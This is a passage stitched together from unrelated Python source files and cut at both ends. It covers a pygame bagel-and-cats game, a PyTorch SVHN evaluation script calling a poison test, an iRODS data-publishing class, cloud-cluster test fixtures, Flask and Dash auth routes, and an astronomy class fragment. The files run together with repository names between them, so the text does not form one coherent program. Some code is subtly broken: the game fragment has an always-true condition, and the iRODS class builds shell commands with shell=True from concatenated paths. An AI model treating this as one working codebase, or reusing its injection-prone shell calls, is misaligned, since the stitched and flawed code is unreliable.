GhostBagel(self.victim.rect.x + 37,self.victim.rect.y + 13,mini_bagelsd2) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) elif self.victim.bagelType == "toaster": # Mini bagels fall out of toaster (if they are toasted then fall out toasted) if self.victim.loaded == 0 and self.victim.toastTimer != 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) elif self.victim.loaded == 1 and self.victim.toastTimer > 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x,self.victim.rect.y,mini_bagelsd2) ghostBagel2.add(allSprites) ghostBagel2.add(ghostBagelList) ghostBagel3 = GhostBagel(self.victim.rect.x,self.victim.rect.y,mini_bagelsd2) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) elif self.victim.loaded == 1 and self.victim.toastTimer <= 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toasted_mini) ghostBagel2.add(allSprites) 
ghostBagel2.add(ghostBagelList) ghostBagel3 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toasted_mini) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) self.move = True self.victim.remove(bagelList) self.victim.add(emptyBList) self.victim.image = None self.victim.rect = pygame.Surface([66,66]).get_rect() self.victim.rect.x = self.victim.storedx self.victim.rect.y = self.victim.storedy self.victim.bagelType = None self.victim.health = 0 self.victim.level = 1 self.victim.fireTimer = 0 self.eat = False self.victim = None if self.victim != None and self.caged == False: if self.victim.health <= 0 and (self.victim.bagelType != "plain" or self.victim.bagelType != "poppy" or self.victim.bagelType != "everything" or self.victim.bagelType != "crais"): # And these two self.victim = None self.eat = False self.move = True elif self.eat == False: self.eatAnimationTime = 0 def melonFire(self,bagelList,bulletImage,catBulletList,allSprites): for i in bagelList: if (i.rect.y <= self.rect.y <= i.rect.y + 23 or i.rect.y <= self.rect.y + 23 <= i.rect.y + 23) and (i.rect.x < self.rect.x) and (i.rect.x + self.rect.x >= 0) and self.eat == False and i.bagelType != "flagel": # Ignore throwing melons at flagels self.fired = True self.shoot = i if self.fired == True and self.eat == False and self.afterShot == 0 and self.paused == False: self.fireTimer += 1 if self.shoot not in bagelList: self.fired = False if self.fireTimer >= 200: bullet = Bullet(self.rect.x - 12, self.rect.y + 12, bulletImage, "melon", 1, 0, False) bullet.add(catBulletList) bullet.add(allSprites) bullet.bulletCatType = "melon" bullet.speed = -6 self.fireTimer = 0 self.afterShot = 1 if self.afterShot >= 1: self.afterShot += 1 if self.afterShot >= 50: self.afterShot = 0 def alienFire(self,bagelList,bulletImage,alienBulletList,allSprites): maxX = -1 target = None for i in bagelList: if (i.rect.y <= self.rect.y <= i.rect.y + 23 or i.rect.y <= self.rect.y + 23 <= i.rect.y + 23) and (i.rect.x < self.rect.x) and (i.rect.x + self.rect.x >= 0) and self.eat == False and i.bagelType != "flagel": # Ignore throwing melons at flagels if i.rect.x > maxX: self.fired = True maxX = i.rect.x target = i if maxX > -1: self.shoot = target if self.fired == True and self.eat == False and self.paused == False: self.fireTimer += 1 if self.fireTimer >= 1000: bullet = AlienBullet(self.rect.x + 14, self.rect.y - 10,bulletImage, self.shoot) bullet.add(alienBulletList) bullet.add(allSprites) self.fireTimer = 0 if self.shoot not in bagelList: self.fired = False def spawnBabies(self,baby_cat,baby_cat_eating,allSprites,catList): if self.health <= 24 and self.sp1 == False: self.sp1 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 18 and self.sp2 == False: self.sp2 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 12 and self.sp3 == False: self.sp3 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 6 and self.sp4 == False: self.sp4 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 0 and self.sp5 == False: self.sp5 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 
13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 cat2 = Cat("baby_cat",2,self.rect.x + 35,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat2.add(allSprites) cat2.add(catList) cat2.speed = 3 cat3 = Cat("baby_cat",2,self.rect.x + 70,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat3.add(allSprites) cat3.add(catList) cat3.speed = 3 def onDeath(self,wheat_image,wheatList,allSprites): if self.health <= 0: self.kill() self.remove() if self.catType != "baby_cat": wheat = Wheat(self.rect.x,self.storedY,wheat_image) wheat.move = False wheat.add(wheatList) wheat.add(allSprites) def draw(self, screen): # Absolutely 100% completely necessary screen.blit(self.image, self.rect) def __getstate__(self): d = dict(self.__dict__) if 'image' in d: del d['image'] if 'mask' in d: del d['mask'] if 'cat' in d: del d['cat'] if 'victim' in d: del d['victim'] if 'image_eating' in d: del d['image_eating'] return d def __setstate__(self, d): self.__dict__.update(d) ZacharyJohnson1/python-graph-theory class Relax: @staticmethod def relax(u, v, w): if v.get_distance() > u.get_distance() + w: v.set_distance(u.get_distance() + w) v.set_parent(u)Bhaskers-Blu-Org1/model-sanitization10-100 from __future__ import print_function import argparse import numpy as np import os import shutil import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torchvision import datasets, transforms from torch.autograd import Variable import utils import models import torchvision # Training settings parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR training') parser.add_argument('--dataset', type=str, default='svhn', help='training dataset (default: cifar100)') parser.add_argument('--batch-size', type=int, default=128, metavar='N', help='input batch size for training (default: 64)') parser.add_argument('--test-batch-size', type=int, default=100, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--epochs', type=int, default=30, metavar='N', help='number of epochs to train (default: 160)') parser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)') parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.1)') parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)') parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W', help='weight decay (default: 1e-4)') parser.add_argument('--resume', default='logs/checkpoint.pth.tar', type=str, metavar='PATH', #logs/checkpoint.pth.tar help='path to latest checkpoint (default: none)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)') parser.add_argument('--log-interval', type=int, default=10, metavar='N', help='how many batches to wait before logging training status') parser.add_argument('--save', default='./logs', type=str, metavar='PATH', help='path to save prune model (default: current directory)') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') parser.add_argument('--depth', default=16, type=int, help='depth of the neural network') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() torch.manual_seed(args.seed) if args.cuda: 
torch.cuda.manual_seed(args.seed) if not os.path.exists(args.save): os.makedirs(args.save) testset = datasets.SVHN('./data.svhn', split='test', transform=transforms.Compose([ transforms.ToTensor()])) transform_test = transforms.Compose([ transforms.ToTensor(), # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset1 = torchvision.datasets.SVHN('./data1', split='test', download=True, transform=transform_test) #test_set1 = utils.loaders_poison_2(testset1) kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {} if args.dataset == 'svhn': # train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True, **kwargs) test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size, shuffle=True, **kwargs) model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.cuda: model.cuda() criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay) if args.resume: if os.path.isfile(args.resume): print("=> loading checkpoint '{}'".format(args.resume)) checkpoint = torch.load(args.resume) args.start_epoch = checkpoint['epoch'] best_prec1 = checkpoint['best_prec1'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) print("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}" .format(args.resume, checkpoint['epoch'], best_prec1)) else: print("=> no checkpoint found at '{}'".format(args.resume)) def test(): model.eval() test_loss = 0 correct = 0 for data, target in test_loader: if args.cuda: data, target = data.cuda(), target.cuda() data, target = Variable(data, volatile=True), Variable(target) output = model(data) test_loss += F.cross_entropy(output, target, size_average=False).item() # sum up batch loss pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability correct += pred.eq(target.data.view_as(pred)).cpu().sum() test_loss /= len(test_loader.dataset) print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.1f}%)\n'.format( test_loss, correct, len(test_loader.dataset), 100. * correct / len(test_loader.dataset))) return correct / float(len(test_loader.dataset)) def save_checkpoint(state, is_best, filepath): torch.save(state, os.path.join(filepath, 'checkpoint.pth.tar')) if is_best: shutil.copyfile(os.path.join(filepath, 'checkpoint.pth.tar'), os.path.join(filepath, 'model_best.pth.tar')) best_prec1 = 0. 
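# The test() function above relies on the pre-0.4 PyTorch API (Variable(..., volatile=True)
# and size_average=False), which current PyTorch versions no longer accept. Below is a
# minimal modern sketch of the same evaluation loop, assuming the global `model`,
# `test_loader` and `args.cuda` defined in this script; torch.no_grad() replaces
# volatile=True and reduction='sum' replaces size_average=False.
def test_no_grad():
    model.eval()
    test_loss = 0.0
    correct = 0
    with torch.no_grad():
        for data, target in test_loader:
            if args.cuda:
                data, target = data.cuda(), target.cuda()
            output = model(data)
            test_loss += F.cross_entropy(output, target, reduction='sum').item()  # sum up batch loss
            pred = output.argmax(dim=1, keepdim=True)  # index of the max log-probability
            correct += pred.eq(target.view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    return correct / float(len(test_loader.dataset))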
#for epoch in range(args.start_epoch, args.epochs): # if epoch in [args.epochs*0.5, args.epochs*0.75]: # for param_group in optimizer.param_groups: # param_group['lr'] *= 0.1 # train(epoch) prec1 = test() res = utils.test_poison(testset1, model, criterion) print(res['accuracy']) # is_best = prec1 > best_prec1 # best_prec1 = max(prec1, best_prec1) # save_checkpoint({ # 'epoch': epoch + 1, # 'state_dict': model.state_dict(), # 'best_prec1': best_prec1, # 'optimizer': optimizer.state_dict(), # 'cfg': model.cfg # }, is_best, filepath=args.save) #!/usr/bin/env python """Adenine analysis script.""" ###################################################################### # Copyright (C) 2016 , , # # FreeBSD License ###################################################################### from __future__ import print_function import imp import sys import os import time import logging import argparse import gzip import numpy as np try: import cPickle as pkl except: import pickle as pkl from adenine.core import analyze_results from adenine.utils import extra def init_main(): """Init analysis main.""" from adenine import __version__ parser = argparse.ArgumentParser(description='Adenine script for ' 'analysing pipelines.') parser.add_argument('--version', action='version', version='%(prog)s v' + __version__) parser.add_argument("result_folder", help="specify results directory") args = parser.parse_args() root_folder = args.result_folder filename = [f for f in os.listdir(root_folder) if os.path.isfile(os.path.join(root_folder, f)) and '.pkl' in f and f != "__data.pkl"] if not filename: sys.stderr.write("No .pkl file found in {}. Aborting...\n" .format(root_folder)) sys.exit(-1) # Run analysis # print("Starting the analysis of {}".format(filename)) main(os.path.join(os.path.abspath(root_folder), filename[0])) def main(dumpfile): """Analyze the pipelines.""" # Load the configuration file config_path = os.path.dirname(dumpfile) config_path = os.path.join(os.path.abspath(config_path), 'ade_config.py') config = imp.load_source('ade_config', config_path) extra.set_module_defaults(config, {'file_format': 'pdf', 'plotting_context': 'paper', 'verbose': False}) if hasattr(config, 'use_compression'): use_compression = config.use_compression else: use_compression = False # Load the results used with ade_run.py try: if use_compression: with gzip.open(os.path.join(os.path.dirname(dumpfile), '__data.pkl.tz'), 'r') as fdata: data_X_y_index = pkl.load(fdata) data = data_X_y_index['X'] labels = data_X_y_index['y'] index = data_X_y_index['index'] else: with open(os.path.join(os.path.dirname(dumpfile), '__data.pkl'), 'r') as fdata: data_X_y_index = pkl.load(fdata) data = data_X_y_index['X'] labels = data_X_y_index['y'] index = data_X_y_index['index'] except IOError: if use_compression: data_filename = '__data.pkl.tz' else: data_filename = '__data.pkl' sys.stderr.write("Cannot load {} Reloading data from " "config file ...".format(data_filename)) data = config.X labels = config.y index = config.index if hasattr(config, 'index') \ else np.arange(data.shape[0]) # Read the feature names from the config file feat_names = config.feat_names if hasattr(config, 'feat_names') \ else np.arange(data.shape[1]) # Initialize the log file filename = 'results_' + os.path.basename(dumpfile)[0:-7] logfile = os.path.join(os.path.dirname(dumpfile), filename + '.log') logging.basicConfig(filename=logfile, level=logging.INFO, filemode='w', format='%(levelname)s (%(name)s): %(message)s') root_logger = logging.getLogger() lsh = logging.StreamHandler() 
lsh.setLevel(20 if config.verbose else logging.ERROR) lsh.setFormatter( logging.Formatter('%(levelname)s (%(name)s): %(message)s')) root_logger.addHandler(lsh) tic = time.time() print("\nUnpickling output ...", end=' ') # Load the results if use_compression: with gzip.open(dumpfile, 'r') as fres: res = pkl.load(fres) else: with open(dumpfile, 'r') as fres: res = pkl.load(fres) print("done: {} s".format(extra.sec_to_time(time.time() - tic))) # Analyze the pipelines analyze_results.analyze(input_dict=res, root=os.path.dirname(dumpfile), y=labels, feat_names=feat_names, index=index, plotting_context=config.plotting_context, file_format=config.file_format) root_logger.handlers[0].close() if __name__ == '__main__': init_main() #!/usr/bin/env python """ @licence: Apache 2.0 @Copyright (c) 2017, (SURFsara) @author: """ #iRODS imports from irods.session import iRODSSession from irods.access import iRODSAccess import irods.keywords as kw #iRODS tickets import subprocess #File and password handling import os import shutil import getpass #PID imports import uuid class irodsPublishCollection(): def __init__(self, envFile, collPath, host='ibridges', user='data', zone='myZone'): if envFile == '': #workaround for testing and when icommands not available print 'irods ', host, 'user ', user, 'zone', zone pw = getpass.getpass().encode('base64') self.session = iRODSSession(host=host, port=1247, user=user, password=pw.decode('base64'), zone=zone) else: self.session = iRODSSession(irods_env_file=envFile) self.coll = self.session.collections.get(collPath) self.mdUpdate('SERIESINFORMATION', 'iRODS Collection '+ self.coll.path) self.md = self.mdGet() def size(self): size = sum([obj.size for obj in self.coll.data_objects]) return size def validate(self, repoKeys = []): ''' Checks whether collection is not empty and is not a nested collection. repoKeys is a set of keys in te iRODS metadata that indicate, when present, that the data have already been published. ''' errorMsg = [] if self.coll.subcollections != []: errorMsg.append('PUBLISH ERROR: Collection contains subcollections.') if self.coll.data_objects == []: errorMsg.append('PUBLISH ERROR: Collection does not contain data.') if len(set(self.coll.metadata.keys()).intersection(repoKeys)) > 0: errorMsg.append('PUBLISH ERROR: Data is already published.') for item in self.coll.metadata.items(): errorMsg.append(item.name+': '+item.value) return errorMsg def assignTicket(self, all = True): ''' Creates irods tickets for anonymous read access for the collection. Ticket can be used in metalnx or wth the icommands to download data. It also creates a metadata entry for the ticket in the metadata of the respective data object or collection to avoid long searches through the iCAT. Note: Not yet available in python client (v0.8), hence icommands wrapper! Returns a dictionary mapping from iRODS paths to tickets. Requires icommands! 
''' tickets = {} errorMsg = [] #iticket create read #imeta add TICKET cmd = 'iticket create read ' + self.coll.path p = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if out == '': errorMsg.append('TICKET ERROR: No ticket created '+ err) return tickets, errorMsg msg = self.mdUpdate('TICKET', out.split(':')[1].strip()) tickets[self.coll.path] = out.split(':')[1].strip() self.mdUpdate('TECHNICALINFO', '{"irods_host": "'+self.session.host \ + '", "irods_port": 1247, "irods_user_name": "anonymous", "irods_zone_name": "' \ + self.session.zone+ '"}; iget/ils -t ' + self.coll.path ) if not all: return tickets, errorMsg for obj in self.coll.data_objects: cmd = 'iticket create read ' + obj.path p = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if out == '': errorMsg.append('TICKET ERROR: No ticket created '+ err) return tickets, errorMsg obj.metadata.add('TICKET', out.split(':')[1].strip()) tickets[obj.path] = out.split(':')[1].strip() return tickets, errorMsg def assignPID(self, pidClient, all = True): ''' Creates epic PIDs for the collection and all its members. Returns a dictionary mapping from iRODS paths to PIDs. pidCredentials - instance of B2Handle EUDATHandleClient. ''' pids = {} #TODO: mint real PIDs pid = str(uuid.uuid1()) self.mdUpdate("PID", pid) pids[self.coll.name] = pid if all: for obj in self.coll.data_objects: pid = str(uuid.uuid1()) obj.metadata.add("PID", pid) pids[obj.name] = pid return pids def close(self, owners = set()): ''' Set permission to read only for group 'public'. Get list of users who created the data. The original creator of the data can be retrieved with obj.owner_name. Script should be executed by a service account for data publishing (role data steward). owners - set of all additinatiol users who have write access to the collection and data objects. ''' #close each data object for obj in self.coll.data_objects: acl = iRODSAccess('read', obj.path, 'public', self.session.zone) self.session.permissions.set(acl) acl = iRODSAccess('read', obj.path, obj.owner_name, self.session.zone) self.session.permissions.set(acl) for owner in owners: acl = iRODSAccess('read', obj.path, owner, self.session.zone) self.session.permissions.set(acl) owners.add(obj.owner_name) #close collection acl = iRODSAccess('read', self.coll.path, 'public', self.session.zone) self.session.permissions.set(acl) for owner in owners: acl = iRODSAccess('read', self.coll.path, owner, self.session.zone) self.session.permissions.set(acl) return owners def open(self, owners): ''' Open collection for writing to certain iRODS users (owners). ''' for owner in owners: acl = iRODSAccess('write', self.coll.path, owner, self.session.zone) self.session.permissions.set(acl) for obj in self.coll.data_objects: acl = iRODSAccess('write', obj.path, owner, self.session.zone) self.session.permissions.set(acl) return ['COLLECTION WRITE ACCESS: ' + str(owners)] def mdUpdate(self, key, value): ''' Update metadata of collection. ''' if key in self.coll.metadata.keys(): print 'METADATA INFO: Collection has already metadata with key: ' + key print 'METADATA INFO: Update metadata entry.' for item in self.coll.metadata.items(): if item.name == key: self.coll.metadata.remove(item) self.coll.metadata.add(key, value) self.md = self.mdGet() return ['METADATA ADDED; '+key+' '+value] def mdGet(self): ''' Reformatting od all metadata of the collection into a python dictionary. 
''' metadata = {} for item in self.coll.metadata.items(): metadata[item.name] = item.value return metadata def getMDall(self, key): ''' Fetches all metadata with with a certain key from all members in a collection. It assumes that the key is only present once. Returns a dictionary iRODS path --> value ''' metadata = {} if key in self.coll.metadata.keys(): metadata[self.coll.path] = self.coll.metadata.get_all(key)[0].value for obj in self.coll.data_objects: if key in obj.metadata.keys(): metadata[obj.path] = obj.metadata.get_all(key)[0].value return metadata 1-10 from typing import Dict, List from cli.src.helpers.ObjDict import ObjDict from cli.src.helpers.objdict_helpers import dict_to_objdict def CONFIG_DOC() -> ObjDict: return dict_to_objdict([ { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-0', 'specification': { 'ip': '172.16.58.3', 'hostname': 'service-vm-2' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-1', 'specification': { 'ip': '192.168.3.11', 'hostname': 'service-vm-4' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-2', 'specification': { 'ip': '192.168.3.11', 'hostname': 'service-vm-1' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-3', 'specification': { 'ip': '172.16.17.32', 'hostname': 'service-vm-0' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-4', 'specification': { 'ip': '172.16.31.10', 'hostname': 'service-vm-3' }, 'version': '1.3.0dev' }, ]) def CLUSTER_MODEL(provider: str) -> ObjDict: return dict_to_objdict({ 'kind': 'epiphany-cluster', 'title': 'Epiphany cluster Config', 'provider': f'{provider}', 'name': 'default', 'specification': { 'prefix': 'prefix', 'name': 'cluster', 'admin_user': { 'name': 'username', 'key_path': '/path/to/key' }, 'cloud': { 'k8s_as_cloud_service': False, 'subscription_name': 'Subscription Name', 'vnet_address_pool': '10.1.0.0/20', 'use_public_ips': True, 'use_service_principal': False, 'region': 'West Europe', 'network': {'use_network_security_groups': True}, 'default_os_image': 'default', 'hostname_domain_extension': '', 'credentials': { 'access_key_id': 'key', 'secret_access_key': 'secret', 'session_token': 'token' } }, 'components': { 'service': { 'count': 5, 'machine': 'service-machine', 'configuration': 'default', 'subnets': [{'address_pool': '10.1.8.0/24'}], 'machines': ['service-0', 'service-1', 'service-2', 'service-3', 'service-4'] } } }, 'version': '1.3.0dev' }) RUNNING_INSTANCES_AZURE: List[List[Dict]] = [ [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-0', 'network': { 'privateIpAddresses': ['10.1.8.6'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-0', 'ipAddress': '172.16.17.32', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-0', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-2', 'network': { 'privateIpAddresses': ['10.1.8.5'], 'publicIpAddresses': [ {'id': 
'/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '172.16.58.3', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-2', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-1', 'network': { 'privateIpAddresses': ['10.1.8.4'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '192.168.3.11', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-1', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-4', 'network': { 'privateIpAddresses': ['10.1.8.3'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '192.168.3.11', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-4', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-3', 'network': { 'privateIpAddresses': ['10.1.8.2'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '172.16.31.10', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-3', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ] ] class AWSMockInstance: def __init__(self, name, ip): self.tags = [] self.tags.append({ 'Key': 'Name', 'Value': name, }) self.private_ip_address = ip self.public_ip_address = ip RUNNING_INSTANCES_AWS: List[Dict] = [ AWSMockInstance('prefix-cluster-service-vm-4', '192.168.3.11'), AWSMockInstance('prefix-cluster-service-vm-1', '192.168.3.11'), AWSMockInstance('prefix-cluster-service-vm-3', '172.16.31.10'), AWSMockInstance('prefix-cluster-service-vm-0', '172.16.17.32'), AWSMockInstance('prefix-cluster-service-vm-2', '172.16.58.3') ] # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from google.appengine.ext import ndb class FrontendJob(ndb.Model): """Class representing a frontend job. A frontend job is a Clovis task sent by the user, and associated metadata (such as the username, the start time...). It is persisted in the Google Cloud datastore. All frontend jobs are ancestors of a single entity called 'FrontendJobList'. This allows to benefit from strong consistency when querying the job associated to a tag. """ # Base URL path to get information about a job. SHOW_JOB_URL = '/show_job' # ndb properties persisted in the datastore. Indexing is not needed. email = ndb.StringProperty(indexed=False) status = ndb.StringProperty(indexed=False) task_url = ndb.StringProperty(indexed=False) eta = ndb.DateTimeProperty(indexed=False) start_time = ndb.DateTimeProperty(auto_now_add=True, indexed=False) # Not indexed by default. 
clovis_task = ndb.TextProperty(compressed=True, indexed=False) log = ndb.TextProperty(indexed=False) @classmethod def _GetParentKeyFromTag(cls, tag): """Gets the key that can be used to retrieve a frontend job from the job list. """ return ndb.Key('FrontendJobList', tag) @classmethod def CreateForTag(cls, tag): """Creates a frontend job associated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) return cls(parent=parent_key) @classmethod def GetFromTag(cls, tag): """Gets the frontend job associated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) return cls.query(ancestor=parent_key).get() @classmethod def DeleteForTag(cls, tag): """Deletes the frontend job assowiated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) frontend_job = cls.query(ancestor=parent_key).get(keys_only=True) if frontend_job: frontend_job.delete() @classmethod def ListJobs(cls): """Lists all the frontend jobs. Returns: list of strings: The list of tags corresponding to existing frontend jobs. """ return [key.parent().string_id() for key in cls.query().fetch( 100, keys_only=True)] @classmethod def GetJobURL(cls, tag): """Gets the URL that can be used to get information about a specific job.""" return cls.SHOW_JOB_URL + '?tag=' + tag def RenderAsHtml(self): """Render a short job description as a HTML table. The log and ClovisTask are not included, because they are potentially very large. """ html = '' for p in FrontendJob._properties: if p == 'log' or p == 'clovis_task': continue value = getattr(self, p) if value: html += '' html += '
<td>' + p + '</td><td>' + str(value) + '</td></tr>
    ' return html from flask import Blueprint, request from .AuthController import find_user, check_user, signup, check_token, get_home auth = Blueprint('auth', __name__, template_folder='auth_templates', url_prefix='/auth') @auth.route('/', methods=["POST"]) def validate(path): if path in ['username', 'email']: return find_user(path, request.form[path]) elif path == 'login': return check_user(request.form) elif path == 'signup': return signup(request.form) @auth.route('/confirm_email/') def confirm_email(token): return check_token(token) @auth.route('/', methods=["GET"]) def home(path): if path == 'home': return get_home() from dash import dcc from dash.development.base_component import Component from flask_login import logout_user from back_office.helpers.login import get_current_user from back_office.routing import Page def _layout() -> Component: if get_current_user().is_authenticated: logout_user() return dcc.Location(pathname='/', id='back_home') PAGE = Page(_layout, None, False) MilkyWay.py # -*- coding: utf-8 -*- """ Created on Mon Jan 17 09:19:39 2022 @author: BI6MHT """ from astropy.coordinates import SkyCoord,Angle,EarthLocation from astropy.time import Time from astropy.constants import c,k_B import astropy.units as u import numpy as np import matplotlib.pyplot as plt # 对曲线进行平滑 #import statsmodels.api as sm #lowess = sm.nonparametric.lowess # 寻求极大值;对曲线进行平滑 from scipy import signal # 单个天体的获取 class MilkyWay(): """ 初始化类的属性 obs_Dir:观测文件所在根目录 obs_Site:观测者在地球上所在位置,例如 obs_Source:观测源的赤经赤纬,例如'12h10m0s 20d' obs_Time:观测的UTC时间,例如'2021-10-30 13:00:43' smooth_Window(默认值31): 即Savitzky-Golay滤波器的窗口长度,值越小,曲线越贴近真实曲线;值越大,平滑效果越厉害(备注:该值必须为正奇整数) smooth_k(默认值3): 值越大,曲线越贴近真实曲线;值越小,曲线平滑越厉害。另外,当k值较大时,受窗口长度限制,拟合会出现问题,高频曲线会变成直线。 """ def __init__(self,obs_Dir,obs_Site,obs_Source,obs_Time,smooth_Window=21,smooth_k=3): self.obs_Freq = 1420.4057517667 self.obs_Dir = obs_Dir self.obs_Site = obs_Site self.obs_Source = obs_Source self.obs_Time = obs_Time self.smooth_Window = smooth_Window self.smooth_k = smooth_k self.obs_GalLon,self.obs_GalLat = self.get_GalCoord() # 获取频谱参数,第一列为频率(MHz);第二列是强度,默认单位为W self.spec = np.loadtxt(self.obs_Dir+self.obs_Source+'.txt',dtype=float,skiprows=1) # 取-150到150km/s之间的径向速度rv,以及对应的等效温度(平滑和未平滑) self.rv, self.equiTemp_Smooth,self.equiTemp = self.get_Smooth() # 得到峰值点以最大径向速度那一点 # 按峰值降序排列 # 最大速度那一点对应末端元素 self.rv_Array,self.T_Array = self.get_Peaks() """ 获取源所在的银经和银维 返回类型:list类型 返回结果:银经 银维 返回例子:'54.2663 0.224174' """ def get_GalCoord(self): Source = SkyCoord(self.obs_Source,frame='icrs') Gal = Source.galactic.to_string() Gal_lon = float(Gal.split(' ')[0]) Gal_lat = float(Gal.split(' ')[1]) return Gal_lon,Gal_lat """ 根据多普勒效应,获取不同频率对应的修正到日心的径向速度 返回类型:一维的numpy.ndarray 返回结果:不同频率对应的径向速度 返回例子:[1098.31559636 ... 
-1005.95448058 -1008.01546988]
    """
    def get_CorrectVel(self):
        obs_Time = Time(self.obs_Time)
        obs_SiteLon = Angle(self.obs_Site.split(' ')[0],unit=u.deg)
        obs_SiteLat = Angle(self.obs_Site.split(' ')[1],unit=u.deg)
        obs_SiteHei = float(self.obs_Site.split(' ')[2])*u.m
